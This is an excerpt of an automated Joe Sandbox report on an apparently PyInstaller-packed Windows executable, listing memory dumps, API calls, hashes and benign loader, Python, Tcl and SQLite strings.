                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction ID: 6a104862ae6561733dc76e785dff575b3bbab90e2287dd45460b8c10d47dd31b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90311072618A8186EB649F60E8803EE7364FBD4B54F444439DA4E47B94EF3CD649CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5CB5
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA979
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7C71CA94F,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CA99E
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5CA4
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F1A
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F2B
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F3C
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                                • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                • Instruction ID: 49fe52c0efb54c8bef4b2294bfeb5a3deef8481bdeba1ae34178854efd9d065f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D1A222A0825247E721FF25E8911B9E761FFE4FA4FC48136EA4D47695DF3CE4428B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction ID: 4acc949ff25e1604dcca31a8d6b788e127df6e90745df49047adb14a0e0792da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7316336618B8186DB61DF25F8802AEB3A4FBD4B64F940135EA8D43B54EF3CD546CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                                • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                • Instruction ID: aaa7dcc27a9280f4d8e29648ee01561f93d4cbd44ea559ef0641044d97f803a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB1D722B1868242EA62AF61B4401B9E3A1EBD4FF4FC54131ED4D07BC5EE3CE542DB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F1A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D567C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F2B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D561C
                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7C71D5F3C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D564C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7C71D617C), ref: 00007FF7C71D5F63
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                                • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                • Instruction ID: a3afe653c8db7ed585f642b260b6afc0db9432d6872ccb6d41ed810dd9c4eac9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8515432A1864287E721FF25F8C15A9E760BBD8FA4FC44135EA4D47696DF3CE4428B60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5830
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5842
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5879
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B588B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58B6
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58CF
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58E1
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58FD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B590F
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B592B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B593D
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5959
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B596B
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5987
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5999
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59B5
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59C7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction ID: 7dec1d2d26a0ae70cfd4d748e6ddabc666cda4741c6470c63d478efb003596ed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E122C564949B4787FA16BF55B8945B4A3B1AFE8FB0FC45539C81F02260FF3CA14A9630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction ID: e44c84c5f4c6194a316a7a0326b91a82db1aba1e61f16489c3dffb044bcd3d5e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2302C56095DB0793FA56BF65B895578A270AFE8F74FC41436C85E02660EF3CB24B8630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439
                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C71B88A7,?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B821C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                • Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                                • Instruction ID: f31e43f7cc1ecf0000b0a3952f4641eef8875ed9369c8e0ed40dc8d8bcd1f458
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3516751A2864283FB51BF25F8926BAE261AFD4FA0FC44431DD4E83695EE2CE5078760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: 0a87ee3060ec78e21d6c2d3bfc048a27d307e8fd5641d8a78f43b3b0b6daa239
                                                                                                                                                                                                                                                • Instruction ID: e7174c52c80f606bb8701608f639d02b6bed5967f7e507e743bba792b976bae3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a87ee3060ec78e21d6c2d3bfc048a27d307e8fd5641d8a78f43b3b0b6daa239
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E051BCA1B0864393EA20BF62B4411A9A3A1BFC4FB4FC04135EE1D47796DE3CE6579760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                • API String ID: 0-3733955532
                                                                                                                                                                                                                                                • Opcode ID: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
                                                                                                                                                                                                                                                • Instruction ID: 0051b72bdce5920a9c83b23bd955b094e8bea21fdd888b376839fa9ec400d395
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F602A371B09A8AC1EA799B91A4F427977A5FF46B84F44C235DE4E47292DF3CE844C380
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
